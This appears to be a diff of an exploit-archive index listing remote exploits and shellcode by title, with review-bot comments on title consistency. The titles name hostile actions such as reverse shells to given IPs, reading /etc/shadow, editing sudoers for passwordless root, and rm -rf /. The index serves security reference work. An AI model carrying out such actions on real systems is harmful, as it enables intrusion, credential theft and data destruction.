33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0
33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0
33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0
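Review bot: Row 33610 quotes the parameter as 'UserID', but the same commit quotes it as 'USERID' in row 37808 for version 5.6 of the same product. Use one spelling in both rows so the two entries group together in title searches.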
@ -15286,7 +15288,7 @@ id,file,description,date,author,platform,type,port
37795,platforms/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",android,remote,0 37795,platforms/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",android,remote,0
37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
37803,platforms/hardware/remote/37803.txt,"CoSoSys Endpoint Protector - Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote,0 37803,platforms/hardware/remote/37803.txt,"CoSoSys Endpoint Protector - Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote,0
37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,win_x86,remote,8443 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,win_x86,remote,8443
37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,python,remote,0 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,python,remote,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0
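Review bot: Row 37808 keeps port 0 although it is a remote exploit for the same web server whose 5.3 entry (33610) lists port 80. Since the row is being edited anyway, set the port column to match or confirm that 0 is intended. The 'USERID' casing also differs from the 'UserID' used in 33610.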
@ -15777,7 +15779,7 @@ id,file,description,date,author,platform,type,port
13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
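Review bot: The new title for 13249 states the protocol twice, "Bind TCP Shell (Random TCP Port)". The neighbouring row 13248 carries it once beside the port, "(31337/TCP)"; consider a form that follows that pattern so the parenthesised part adds information rather than repeating the shell type.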
@ -15791,7 +15793,7 @@ id,file,description,date,author,platform,type,port
13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0
13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0
13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
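Review bot: The rename of 13265 swaps "JMP" for "Payload Loader" but keeps "ConnectBack", while 13263 and 13267 in the same hunk describe the same outbound-connection behaviour as "Reverse TCP". Anyone filtering the description column on "Reverse TCP" will miss this row, so consider "Reverse TCP (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader ..." here. The untouched 13267 row also writes its endpoint as "(127.0.0.1:8000)" without the "/TCP" suffix the other rows use.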
@ -15808,22 +15810,22 @@ id,file,description,date,author,platform,type,port
13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0
13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13284,platforms/generator/shellcode/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,generator,shellcode,0 13284,platforms/generator/shellcode/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - Command Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",generator,shellcode,0
13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0 13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
13290,platforms/ios/shellcode/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
13297,platforms/generator/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,generator,shellcode,0 13297,platforms/generator/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,generator,shellcode,0
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
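Review bot: The new title for 13285, "Linux/x86 - Command Generator Null-Free Shellcode (Generator)", now says "Generator" twice; the other generator rows in this hunk (13281, 13282, 13283) carry it only as the trailing "(Generator)" tag. If the intent is to say the tool builds shellcode for an arbitrary command, something like "Execute Command Null-Free Shellcode (Generator)" states that without the repetition. Separately, the new 13299 title ends its call with a semicolon, "execve(...); Shellcode", which 13279's "exec(_/bin/sh_) Shellcode" in the same hunk does not.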
@ -15831,9 +15833,9 @@ id,file,description,date,author,platform,type,port
13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
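Review bot: On 13307 the size changes from "(64 bytes)" to "(35/64 bytes)" with nothing in the title saying what the two figures refer to. If they are the sizes before and after the self-modifying stage runs, or two variants in the file, say so in the title or the commit message; a consumer parsing the byte count out of the description now gets two numbers for one row. The 13309 rename also ends in "Receive Shellcode + Payload Loader Shellcode", where the first "Shellcode" is a behaviour and the second is the type suffix, which reads as a duplicate.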
@ -15848,28 +15850,28 @@ id,file,description,date,author,platform,type,port
13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0
13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,generator,shellcode,0 13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,generator,shellcode,0
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0 13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0
